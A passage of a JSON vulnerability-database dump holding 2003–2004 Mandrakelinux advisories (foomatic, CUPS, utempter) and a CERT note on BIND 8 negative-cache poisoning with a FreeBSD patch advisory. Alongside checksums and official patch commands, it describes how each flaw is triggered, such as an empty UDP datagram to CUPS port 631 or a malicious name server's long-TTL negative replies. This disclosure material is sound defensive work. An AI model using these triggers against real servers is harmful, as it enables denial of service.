4e2d702a616369ef122b16a112923c3c 9.2/RPMS/libgimpprint1-devel-4.2.5-30.1.92mdk.i586.rpm\r\n f9a5f949e4342b550a52112aba77fdde 9.2/RPMS/libijs0-0.34-56.1.92mdk.i586.rpm\r\n 4bf9b3b6b6f210490dd74771f81929e8 9.2/RPMS/libijs0-devel-0.34-56.1.92mdk.i586.rpm\r\n b8145f433d635d70228438401fba14d2 9.2/RPMS/omni-0.7.2-32.1.92mdk.i586.rpm\r\n 43850e0a55dadfd65ddbfbf3a0234264 9.2/RPMS/printer-filters-1.0-116.1.92mdk.i586.rpm\r\n c5baf817bd47ba680733f87b546f0b2a 9.2/RPMS/printer-testpages-1.0-116.1.92mdk.i586.rpm\r\n 0e0de87f4facbb33d9716c22f6c53a0e 9.2/RPMS/printer-utils-1.0-116.1.92mdk.i586.rpm\r\n 3ac289d0ad9ccbae59ffbbff1d0ef6d0 9.2/SRPMS/printer-drivers-1.0-116.1.92mdk.src.rpm\r\n\r\n Mandrakelinux 9.2/AMD64:\r\n 3805d72ab483ca73c17ec668fcfea260 amd64/9.2/RPMS/cups-drivers-1.1-116.1.92mdk.amd64.rpm\r\n 4120e7ae8d18452e0d010d9f6dad68ab amd64/9.2/RPMS/foomatic-db-3.0-1.20030908.3.1.92mdk.amd64.rpm\r\n 541fb6b621453eb2f2eb4cd3cc66bdb6 amd64/9.2/RPMS/foomatic-db-engine-3.0-1.20030908.3.1.92mdk.amd64.rpm\r\n 120453007ef1d4e2201f47bc9b435b6f amd64/9.2/RPMS/foomatic-filters-3.0-1.20030908.3.1.92mdk.amd64.rpm\r\n ba54c898100a7e8f8a648ab6be4dff4a amd64/9.2/RPMS/ghostscript-7.07-0.12.1.92mdk.amd64.rpm\r\n 0088c1cad9cb1c5a3dcdfec551d1b436 amd64/9.2/RPMS/ghostscript-module-X-7.07-0.12.1.92mdk.amd64.rpm\r\n ef2d193c0209974f5dc519824d4ce6ef amd64/9.2/RPMS/gimpprint-4.2.5-30.1.92mdk.amd64.rpm\r\n 7e9d6e3afd9e6f55f518693d00da089a amd64/9.2/RPMS/lib64gimpprint1-4.2.5-30.1.92mdk.amd64.rpm\r\n b76c616669975e31b4c207edad6a64e2 amd64/9.2/RPMS/lib64gimpprint1-devel-4.2.5-30.1.92mdk.amd64.rpm\r\n f117b249358c122cd42c86ea0ba671f6 amd64/9.2/RPMS/lib64ijs0-0.34-56.1.92mdk.amd64.rpm\r\n 9ef6acb512d398a9e68fbc52436206ca amd64/9.2/RPMS/lib64ijs0-devel-0.34-56.1.92mdk.amd64.rpm\r\n 3cf204dea9e41a3c421e30b632ff620e amd64/9.2/RPMS/omni-0.7.2-32.1.92mdk.amd64.rpm\r\n ee634dcbe58b639f6573f4b1f735ef94 amd64/9.2/RPMS/printer-filters-1.0-116.1.92mdk.amd64.rpm\r\n a8ce95c71a3c7a1588168fe71c72aa3f amd64/9.2/RPMS/printer-testpages-1.0-116.1.92mdk.amd64.rpm\r\n 1953aeb5c4e92e4e2c991ffabb27bbea amd64/9.2/RPMS/printer-utils-1.0-116.1.92mdk.amd64.rpm\r\n 3ac289d0ad9ccbae59ffbbff1d0ef6d0 amd64/9.2/SRPMS/printer-drivers-1.0-116.1.92mdk.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrakeUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandrakesoft for security. You can obtain\r\n the GPG public key of the Mandrakelinux Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandrakelinux at:\r\n\r\n http://www.mandrakesoft.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_linux-mandrake.com\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team\r\n &lt;security linux-mandrake.com&gt;\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.0.7 &#40;GNU/Linux&#41;\r\n\r\niD8DBQFBSGpUmqjQ0CJFipgRApTFAJ9Dq19mr5vUI6oJakdt2k3/RnsECACfYSZx\r\n5Jwv6WsUJH/3Wj9tiua1Jy4=\r\n=uMtu\r\n-----END PGP SIGNATURE-----", "modified": "2004-09-16T00:00:00", "published": "2004-09-16T00:00:00", "id": "SECURITYVULNS:DOC:6820", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:6820", "title": "MDKSA-2004:094 - Updated printer-drivers packages fix vulnerability in foomatic", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:10", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandrakelinux Security Update Advisory\r\n _______________________________________________________________________\r\n\r\n Package name: cups\r\n Advisory ID: MDKSA-2004:097\r\n Date: September 15th, 2004\r\n\r\n Affected versions: 10.0, 9.2, Corporate Server 2.1\r\n ______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Alvaro Martinez Echevarria discovered a vulnerability in the CUPS\r\n print server where an empty UDP datagram sent to port 631 &#40;the default\r\n port that cupsd listens to&#41; would disable browsing. This would\r\n prevent cupsd from seeing any remote printers or any future remote\r\n printer changes.\r\n \r\n The updated packages are patched to protect against this vulnerability.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0558\r\n http://www.cups.org/str.php?L863\r\n ______________________________________________________________________\r\n\r\n Updated Packages:\r\n \r\n Mandrakelinux 10.0:\r\n 6f786e3ec36e246d7370f492e53e8071 10.0/RPMS/cups-1.1.20-5.1.100mdk.i586.rpm\r\n 3b648685e2d6daca32c19f0c911c2a2d 10.0/RPMS/cups-common-1.1.20-5.1.100mdk.i586.rpm\r\n c38951a854429442227c08493ce95b10 10.0/RPMS/cups-serial-1.1.20-5.1.100mdk.i586.rpm\r\n 68d867e3151cc40be946f7e6585718b3 10.0/RPMS/libcups2-1.1.20-5.1.100mdk.i586.rpm\r\n 73a61738b404f9ffe2f5d33d999c58d8 10.0/RPMS/libcups2-devel-1.1.20-5.1.100mdk.i586.rpm\r\n dbf32babe26d1b9bf922839fd4f64409 10.0/SRPMS/cups-1.1.20-5.1.100mdk.src.rpm\r\n\r\n Mandrakelinux 10.0/AMD64:\r\n 9dd4e92fa6761ce6414583f3673dab6b amd64/10.0/RPMS/cups-1.1.20-5.1.100mdk.amd64.rpm\r\n e49fdc4df0ab800ad48c24a87117a63f amd64/10.0/RPMS/cups-common-1.1.20-5.1.100mdk.amd64.rpm\r\n ccc5ae05b07c3a56eb30cfe3a95e2aea amd64/10.0/RPMS/cups-serial-1.1.20-5.1.100mdk.amd64.rpm\r\n a816a4ad33164d23d0a5425b900d9ce0 amd64/10.0/RPMS/lib64cups2-1.1.20-5.1.100mdk.amd64.rpm\r\n feeed14726902046368619d8e5f680c4 amd64/10.0/RPMS/lib64cups2-devel-1.1.20-5.1.100mdk.amd64.rpm\r\n dbf32babe26d1b9bf922839fd4f64409 amd64/10.0/SRPMS/cups-1.1.20-5.1.100mdk.src.rpm\r\n\r\n Corporate Server 2.1:\r\n 142f95c8680e081dfbfb53e586de0758 corporate/2.1/RPMS/cups-1.1.18-2.3.C21mdk.i586.rpm\r\n 13510fb948f686e81cb0e43ed199a5c9 corporate/2.1/RPMS/cups-common-1.1.18-2.3.C21mdk.i586.rpm\r\n fe7759d16276087aea078a4666d27264 corporate/2.1/RPMS/cups-serial-1.1.18-2.3.C21mdk.i586.rpm\r\n d5a3ad2d14a730b633153bc486f8d043 corporate/2.1/RPMS/libcups1-1.1.18-2.3.C21mdk.i586.rpm\r\n b1ac7b51317da42444ea35e5e3e1def3 corporate/2.1/RPMS/libcups1-devel-1.1.18-2.3.C21mdk.i586.rpm\r\n 0cfaa49e8d722afad7886998121a8ef2 corporate/2.1/SRPMS/cups-1.1.18-2.3.C21mdk.src.rpm\r\n\r\n Corporate Server 2.1/x86_64:\r\n 53d838ecedc3d39880e43476cdba933d x86_64/corporate/2.1/RPMS/cups-1.1.18-2.3.C21mdk.x86_64.rpm\r\n 71df87e1abeb7cbf1dff2d206476f149 x86_64/corporate/2.1/RPMS/cups-common-1.1.18-2.3.C21mdk.x86_64.rpm\r\n 93d9708fbbc34f7ea44b40f193a35bf1 x86_64/corporate/2.1/RPMS/cups-serial-1.1.18-2.3.C21mdk.x86_64.rpm\r\n 4a2d2ace8e2ddf9e29061fff3b0b2e72 x86_64/corporate/2.1/RPMS/libcups1-1.1.18-2.3.C21mdk.x86_64.rpm\r\n 7edc440141df40c2dbfb814c7221e511 x86_64/corporate/2.1/RPMS/libcups1-devel-1.1.18-2.3.C21mdk.x86_64.rpm\r\n 0cfaa49e8d722afad7886998121a8ef2 x86_64/corporate/2.1/SRPMS/cups-1.1.18-2.3.C21mdk.src.rpm\r\n\r\n Mandrakelinux 9.2:\r\n b46e23e49906b9837f8ff8a2f1551a1a 9.2/RPMS/cups-1.1.19-10.1.92mdk.i586.rpm\r\n 41882610ebe7ef19c62d0466a3b856bd 9.2/RPMS/cups-common-1.1.19-10.1.92mdk.i586.rpm\r\n 80285eaf595e788bf83cb06c3be6399b 9.2/RPMS/cups-serial-1.1.19-10.1.92mdk.i586.rpm\r\n eeb50273236cab134566e4ba9aa19de7 9.2/RPMS/libcups2-1.1.19-10.1.92mdk.i586.rpm\r\n 9eebdc74a019cbf01a36e91cb0f2da38 9.2/RPMS/libcups2-devel-1.1.19-10.1.92mdk.i586.rpm\r\n b2badd330ea284850e42f9107bb178cf 9.2/SRPMS/cups-1.1.19-10.1.92mdk.src.rpm\r\n\r\n Mandrakelinux 9.2/AMD64:\r\n bd01da75ac66983321eca2394853eb56 amd64/9.2/RPMS/cups-1.1.19-10.1.92mdk.amd64.rpm\r\n 865443156fd350d0b06c1696f923d413 amd64/9.2/RPMS/cups-common-1.1.19-10.1.92mdk.amd64.rpm\r\n 78ed4c034ee5fa27b85dd89d909a1a3c amd64/9.2/RPMS/cups-serial-1.1.19-10.1.92mdk.amd64.rpm\r\n 7e868f59baa290fbef9f933ac76156ce amd64/9.2/RPMS/lib64cups2-1.1.19-10.1.92mdk.amd64.rpm\r\n db3266a647e39805f0b9f36fa87dcac1 amd64/9.2/RPMS/lib64cups2-devel-1.1.19-10.1.92mdk.amd64.rpm\r\n b2badd330ea284850e42f9107bb178cf amd64/9.2/SRPMS/cups-1.1.19-10.1.92mdk.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrakeUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandrakesoft for security. You can obtain\r\n the GPG public key of the Mandrakelinux Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandrakelinux at:\r\n\r\n http://www.mandrakesoft.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_linux-mandrake.com\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team\r\n &lt;security linux-mandrake.com&gt;\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.0.7 &#40;GNU/Linux&#41;\r\n\r\niD8DBQFBSJATmqjQ0CJFipgRAgi4AJ4hX3e+0849lql7lwNX37B6Wk3I8gCfceiU\r\nlMl3gN7n7Pvj20zxNFqdGtM=\r\n=5r+U\r\n-----END PGP SIGNATURE-----", "modified": "2004-09-16T00:00:00", "published": "2004-09-16T00:00:00", "id": "SECURITYVULNS:DOC:6819", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:6819", "title": "MDKSA-2004:097 - Updated cups packages fix DoS vulnerability", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:09", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandrakelinux Security Update Advisory\r\n _______________________________________________________________________\r\n\r\n Package name: utempter\r\n Advisory ID: MDKSA-2004:031\r\n Date: April 19th, 2004\r\n\r\n Affected versions: 10.0, 9.1, 9.2, Corporate Server 2.1,\r\n Multi Network Firewall 8.2\r\n ______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Steve Grubb discovered two potential issues in the utempter program:\r\n \r\n 1&#41; If the path to the device contained /../ or /./ or //, the \r\n program was not exiting as it should. It would be possible to use something \r\n like /dev/../tmp/tty0, and then if /tmp/tty0 were deleted and symlinked \r\n to another important file, programs that have root privileges that do no \r\n further validation can then overwrite whatever the symlink pointed to.\r\n \r\n 2&#41; Several calls to strncpy without a manual termination of the string.\r\n This would most likely crash utempter.\r\n \r\n The updated packages are patched to correct these problems.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0233\r\n ______________________________________________________________________\r\n\r\n Updated Packages:\r\n \r\n Mandrakelinux 10.0:\r\n e5458d8e68dd55b2dcface9f2ead71cd 10.0/RPMS/libutempter0-0.5.2-12.1.100mdk.i586.rpm\r\n 366d48de884799751c7110f84d835cc0 10.0/RPMS/libutempter0-devel-0.5.2-12.1.100mdk.i586.rpm\r\n 6eabf21bdf9d7eba1a86fac4589e5714 10.0/RPMS/utempter-0.5.2-12.1.100mdk.i586.rpm\r\n 52a5e2fa807981cba7156213684bb9ce 10.0/SRPMS/utempter-0.5.2-12.1.100mdk.src.rpm\r\n\r\n Corporate Server 2.1:\r\n c16478b61d52db976f712b5817bbf167 corporate/2.1/RPMS/libutempter0-0.5.2-11.1.C21mdk.i586.rpm\r\n 7f74bd805709457dfb71a3bdc91f2577 corporate/2.1/RPMS/libutempter0-devel-0.5.2-11.1.C21mdk.i586.rpm\r\n eb25144f12a1d93d7d9634964a1d7bbd corporate/2.1/RPMS/utempter-0.5.2-11.1.C21mdk.i586.rpm\r\n ef9fe684449e0faaf59be81ed63df284 corporate/2.1/SRPMS/utempter-0.5.2-11.1.C21mdk.src.rpm\r\n\r\n Corporate Server 2.1/x86_64:\r\n 284d5f6f9bded143a8d26c8062eb9e70 x86_64/corporate/2.1/RPMS/libutempter0-0.5.2-11.1.C21mdk.x86_64.rpm\r\n 62ada7f5235b513c978dc8eea2184b8b x86_64/corporate/2.1/RPMS/libutempter0-devel-0.5.2-11.1.C21mdk.x86_64.rpm\r\n 8755f9214bb5412a204b24e6cce68ab5 x86_64/corporate/2.1/RPMS/utempter-0.5.2-11.1.C21mdk.x86_64.rpm\r\n ef9fe684449e0faaf59be81ed63df284 x86_64/corporate/2.1/SRPMS/utempter-0.5.2-11.1.C21mdk.src.rpm\r\n\r\n Mandrakelinux 9.1:\r\n ff42f22d509bf90dc87c29acf970548b 9.1/RPMS/libutempter0-0.5.2-10.1.91mdk.i586.rpm\r\n 7f100656a81b88e2ddc0f1a3ffd6cc1d 9.1/RPMS/libutempter0-devel-0.5.2-10.1.91mdk.i586.rpm\r\n ae56735580eaff60027404a27843b28f 9.1/RPMS/utempter-0.5.2-10.1.91mdk.i586.rpm\r\n 1f308d636a246978a66f79802467e09b 9.1/SRPMS/utempter-0.5.2-10.1.91mdk.src.rpm\r\n\r\n Mandrakelinux 9.1/PPC:\r\n 1c72b8d5bf1e88e267fdd818094f1d52 ppc/9.1/RPMS/libutempter0-0.5.2-10.1.91mdk.ppc.rpm\r\n 45e56e24d73c0744460908206164bad6 ppc/9.1/RPMS/libutempter0-devel-0.5.2-10.1.91mdk.ppc.rpm\r\n 218199c662a394416a5b37ce95fe69fe ppc/9.1/RPMS/utempter-0.5.2-10.1.91mdk.ppc.rpm\r\n 1f308d636a246978a66f79802467e09b ppc/9.1/SRPMS/utempter-0.5.2-10.1.91mdk.src.rpm\r\n\r\n Mandrakelinux 9.2:\r\n 90522a1350a48e3527ac5d62e9f42d02 9.2/RPMS/libutempter0-0.5.2-12.1.92mdk.i586.rpm\r\n 93cc7f6b06e932fb669cf4f6e76d219f 9.2/RPMS/libutempter0-devel-0.5.2-12.1.92mdk.i586.rpm\r\n 9295f7ce85188523ef2ddf02e2137d4b 9.2/RPMS/utempter-0.5.2-12.1.92mdk.i586.rpm\r\n 6bcb323d7d50949a1b4f8bae5bd84fd6 9.2/SRPMS/utempter-0.5.2-12.1.92mdk.src.rpm\r\n\r\n Mandrakelinux 9.2/AMD64:\r\n 92b815911cfc95b1fe982b1e6d34fbe9 amd64/9.2/RPMS/lib64utempter0-0.5.2-12.1.92mdk.amd64.rpm\r\n 7e5c27d4817e8bd1cb661baf4fa2098d amd64/9.2/RPMS/lib64utempter0-devel-0.5.2-12.1.92mdk.amd64.rpm\r\n d83101f51887fa4576ba70bd44dc96d4 amd64/9.2/RPMS/utempter-0.5.2-12.1.92mdk.amd64.rpm\r\n 6bcb323d7d50949a1b4f8bae5bd84fd6 amd64/9.2/SRPMS/utempter-0.5.2-12.1.92mdk.src.rpm\r\n\r\n Multi Network Firewall 8.2:\r\n 4a73fd406115139f44a96595d7a7d636 mnf8.2/RPMS/libutempter0-0.5.2-5.1.M82mdk.i586.rpm\r\n 4ec3be7ee3b1afc20cee08edd699d88c mnf8.2/RPMS/libutempter0-devel-0.5.2-5.1.M82mdk.i586.rpm\r\n 6f88c9436293c120c90877f12d8426a9 mnf8.2/RPMS/utempter-0.5.2-5.1.M82mdk.i586.rpm\r\n 273359b6f93965a0995a6c11cf3a1d77 mnf8.2/SRPMS/utempter-0.5.2-5.1.M82mdk.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrakeUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n A list of FTP mirrors can be obtained from:\r\n\r\n http://www.mandrakesecure.net/en/ftp.php\r\n\r\n All packages are signed by Mandrakesoft for security. You can obtain\r\n the GPG public key of the Mandrakelinux Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver www.mandrakesecure.net 0x22458A98\r\n\r\n Please be aware that sometimes it takes the mirrors a few hours to\r\n update.\r\n\r\n You can view other update advisories for Mandrakelinux at:\r\n\r\n http://www.mandrakesecure.net/en/advisories/\r\n\r\n Mandrakesoft has several security-related mailing list services that\r\n anyone can subscribe to. Information on these lists can be obtained by\r\n visiting:\r\n\r\n http://www.mandrakesecure.net/en/mlist.php\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_linux-mandrake.com\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team\r\n &lt;security linux-mandrake.com&gt;\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.0.7 &#40;GNU/Linux&#41;\r\n\r\niD8DBQFAhB+AmqjQ0CJFipgRAph7AKDlya68fexJ14qf1DchzBMhGBA+0gCgsOEM\r\naRlgv9npCuiEhF7aWN+PaJg=\r\n=5mCk\r\n-----END PGP SIGNATURE-----", "modified": "2004-04-20T00:00:00", "published": "2004-04-20T00:00:00", "id": "SECURITYVULNS:DOC:6109", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:6109", "title": "MDKSA-2004:031 - Updated utempter packages fix several vulnerabilities", "type": "securityvulns", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "cert": [{"lastseen": "2019-05-29T20:44:22", "bulletinFamily": "info", "description": "### Overview \n\nThe BIND 8 name server contains a cache poisoning vulnerability that allows attackers to conduct denial-of-service attacks on specific target domains.\n\n### Description \n\nSeveral versions of the BIND 8 name server are vulnerable to cache poisoning via negative responses. To exploit this vulnerability, an attacker must configure a name server to return authoritative negative responses for a given target domain. Then, the attacker must convince a victim user to query the attacker's maliciously configured name server. When the attacker's name server receives the query, it will reply with an authoritative negative response containing a large TTL (time-to-live) value. If the victim's site runs a vulnerable version of BIND 8, it will cache the negative response and render the target domain unreachable until the TTL expires. \n \n--- \n \n### Impact \n\nAttackers may conduct denial-of-service attacks on specific target domains by enticing users to query a malicious name server. \n \n--- \n \n### Solution \n\n**Upgrade BIND**\n\nThe ISC has prepared BIND 8.3.7 and BIND 8.4.3 to address this vulnerability. Name servers running BIND 4 are not affected. To obtain the latest versions of BIND, please visit \n \n<http://www.isc.org/products/BIND/> \n \n**Apply a patch or updated version from your vendor** \n \nMany operating system vendors include BIND with their products and will be preparing new versions to address this vulnerability. For a list of vendors that the CERT/CC has received information from regarding this vulnerability, please see the Systems Affected section of this document. \n \n--- \n \n### Vendor Information\n\n734644\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ __ Apple Computer Inc.\n\nNotified: October 21, 2003 Updated: December 11, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nMac OS X 10.3 and later: Not Vulnerable. Mac OS X 10.3 uses a later version of BIND that does not have this vulnerability. \n\n\nMac OS X 10.2.x: Recommend upgrading to Mac OS X 10.2.8, then installing BIND 8.4.3 as follows: \n \nFirst install the Developer Tools if they are not already present, then perform the following steps from the command-line in an application such as Terminal: \n \n1\\. Download BIND version 8.4.3 by executing the following command: \ncurl -O <ftp://ftp.isc.org/isc/bind/src/8.4.3/bind-src.tar.gz> \n \n2\\. Verify the integrity of this file by typing: \ncksum bind-src.tar.gz \nwhich should indicate \"3224691664 1438439 bind-src.tar.gz\" \n \n3\\. Unpack the distribution as follows: \ntar xvzf bind-src.tar.gz \n \n4\\. Now you're ready to start building the distribution. \ncd to the src/ directory and type \"make\" \n \n5\\. The next step will install the new named daemon: \nsudo cp bin/named/named /usr/sbin/ \n \n6\\. Reboot \n\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23734644 Feedback>).\n\n### __ __ FreeBSD\n\nNotified: October 21, 2003 Updated: December 01, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nPlease see <ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-03:19.bind.asc>\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\n`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n`\n\n`============================================================================= \nFreeBSD-SA-03:19.bind Security Advisory` \n`The FreeBSD Project \n` \n`Topic: bind8 negative cache poison attack \n` \n`Category: contrib \nModule: contrib_bind \nAnnounced: 2003-11-28 \nCredits: Internet Software Consortium \nAffects: FreeBSD versions through 4.9-RELEASE and 5.1-RELEASE` \n`4-STABLE prior to the correction date \nCorrected: 2003-11-28 22:13:47 UTC (RELENG_4, 4.9-STABLE)` \n`2003-11-27 00:54:53 UTC (RELENG_5_1, 5.1-RELEASE-p11) \n2003-11-27 16:54:01 UTC (RELENG_5_0, 5.0-RELEASE-p19) \n2003-11-27 00:56:06 UTC (RELENG_4_9, 4.9-RELEASE-p1) \n2003-11-27 16:34:22 UTC (RELENG_4_8, 4.8-RELEASE-p14) \n2003-11-27 16:35:06 UTC (RELENG_4_7, 4.7-RELEASE-p24) \n2003-11-27 16:37:00 UTC (RELENG_4_6, 4.6.2-RELEASE-p27) \n2003-11-27 16:38:36 UTC (RELENG_4_5, 4.5-RELEASE-p37) \n2003-11-27 16:40:03 UTC (RELENG_4_4, 4.4-RELEASE-p47)` \n`CVE Name: CAN-2003-0914 \nFreeBSD only: NO \n` \n`For general information regarding FreeBSD Security Advisories, \nincluding descriptions of the fields above, security branches, and the \nfollowing sections, please visit \n<URL:``<http://www.freebsd.org/security/>``>. \n` \n`I. Background \n` \n`BIND 8 is an implementation of the Domain Name System (DNS) protocols. \nThe named(8) daemon is the Internet domain name server. \n` \n`II. Problem Description \n` \n`A programming error in BIND 8 named can result in a DNS message being \nincorrectly cached as a negative response. \n` \n`III. Impact \n` \n`An attacker may arrange for malicious DNS messages to be delivered \nto a target name server, and cause that name server to cache a \nnegative response for some target domain name. The name server would \nthereafter respond negatively to legitimate queries for that domain \nname, resulting in a denial-of-service for applications that require \nDNS. Almost all Internet applications require DNS, such as the Web, \nemail, and chat networks. \n` \n`IV. Workaround \n` \n`No workaround is known. \n` \n`V. Solution \n` \n`Do one of the following: \n` \n`1) Upgrade your vulnerable system to 4.9-STABLE; or to the RELENG_5_1, \nRELENG_4_9, RELENG_4_8, or RELENG_4_7 security branch dated after the \ncorrection date. \n` \n`2) To patch your present system: \n` \n`a) Download the relevant patch from the location below, and verify the \ndetached PGP signature using your PGP utility. \n` \n`[FreeBSD 4.9 and -STABLE systems] \n# fetch ``<ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:19/bind-836.patch>`` \n# fetch ``<ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:19/bind-836.patch.asc>`` \n` \n`[FreeBSD 4.8 and 5.1 systems] \n# fetch ``<ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:19/bind-834.patch>`` \n# fetch ``<ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:19/bind-834.patch.asc>`` \n` \n`[FreeBSD 4.4, 4.5, 4.6, 4.7, and 5.0 systems] \n# fetch ``<ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:19/bind-833.patch>`` \n# fetch ``<ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:19/bind-833.patch.asc>`` \n` \n`b) Execute the following commands as root: \n` \n`# cd /usr/src \n# patch < /path/to/patch \n# cd /usr/src/lib/libbind \n# make obj && make depend && make \n# cd /usr/src/lib/libisc \n# make obj && make depend && make \n# cd /usr/src/usr.sbin/named \n# make obj && make depend && make && make install \n# cd /usr/src/libexec/named-xfer \n# make obj && make depend && make && make install \n` \n`After upgrading or patching your system, you must restart named. \nExecute the following command as root: \n` \n`# ndc restart \n` \n`VI. Correction details \n` \n`The following list contains the revision numbers of each file that was \ncorrected in FreeBSD. \n` \n`Branch Revision \nPath` \n`- ------------------------------------------------------------------------- \nRELENG_4` \n`src/contrib/bind/CHANGES 1.1.1.7.2.11 \nsrc/contrib/bind/README 1.1.1.7.2.9 \nsrc/contrib/bind/Version 1.1.1.3.2.10 \nsrc/contrib/bind/bin/named-xfer/named-xfer.c 1.3.2.8 \nsrc/contrib/bind/bin/named/Makefile 1.3.2.6 \nsrc/contrib/bind/bin/named/ns_init.c 1.1.1.2.2.6 \nsrc/contrib/bind/bin/named/ns_resp.c 1.1.1.2.2.11 \nsrc/contrib/bind/bin/nslookup/commands.l 1.4.2.5 \nsrc/contrib/bind/bin/nslookup/debug.c 1.3.2.6 \nsrc/contrib/bind/bin/nslookup/getinfo.c 1.3.2.9 \nsrc/contrib/bind/bin/nslookup/main.c 1.3.2.7 \nsrc/contrib/bind/doc/man/dig.1 1.3.2.4 \nsrc/contrib/bind/doc/man/host.1 1.3.2.5 \nsrc/contrib/bind/doc/man/nslookup.8 1.2.2.5 \nsrc/contrib/bind/port/freebsd/include/port_after.h 1.6.2.9 \nsrc/contrib/bind/port/freebsd/include/port_before.h 1.1.1.2.2.6` \n`RELENG_5_1 \nsrc/UPDATING 1.251.2.13 \nsrc/sys/conf/newvers.sh 1.50.2.13 \nsrc/contrib/bind/Version 1.1.1.11.2.1 \nsrc/contrib/bind/bin/named/ns_resp.c 1.1.1.11.2.1` \n`RELENG_5_0 \nsrc/UPDATING 1.229.2.25 \nsrc/sys/conf/newvers.sh 1.48.2.20 \nsrc/contrib/bind/Version 1.1.1.10.2.1 \nsrc/contrib/bind/bin/named/ns_resp.c 1.1.1.10.2.1` \n`RELENG_4_9 \nsrc/UPDATING 1.73.2.89.2.2 \nsrc/sys/conf/newvers.sh 1.44.2.32.2.2 \nsrc/contrib/bind/Version 1.1.1.3.2.9.2.1 \nsrc/contrib/bind/bin/named/ns_resp.c 1.1.1.2.2.10.2.1` \n`RELENG_4_8 \nsrc/UPDATING 1.73.2.80.2.16 \nsrc/sys/conf/newvers.sh 1.44.2.29.2.15 \nsrc/contrib/bind/Version 1.1.1.3.2.8.2.1 \nsrc/contrib/bind/bin/named/ns_resp.c 1.1.1.2.2.9.2.1` \n`RELENG_4_7 \nsrc/UPDATING 1.73.2.74.2.27 \nsrc/sys/conf/newvers.sh 1.44.2.26.2.26 \nsrc/contrib/bind/Version 1.1.1.3.2.7.2.1 \nsrc/contrib/bind/bin/named/ns_resp.c 1.1.1.2.2.7.2.2` \n`RELENG_4_6 \nsrc/UPDATING 1.73.2.68.2.56 \nsrc/sys/conf/newvers.sh 1.44.2.23.2.44 \nsrc/contrib/bind/Version 1.1.1.3.2.6.2.2 \nsrc/contrib/bind/bin/named/ns_resp.c 1.1.1.2.2.6.2.3` \n`RELENG_4_5 \nsrc/UPDATING 1.73.2.50.2.54 \nsrc/sys/conf/newvers.sh 1.44.2.20.2.38 \nsrc/contrib/bind/Version 1.1.1.3.2.4.4.2 \nsrc/contrib/bind/bin/named/ns_resp.c 1.1.1.2.2.4.4.3` \n`RELENG_4_4 \nsrc/UPDATING 1.73.2.43.2.55 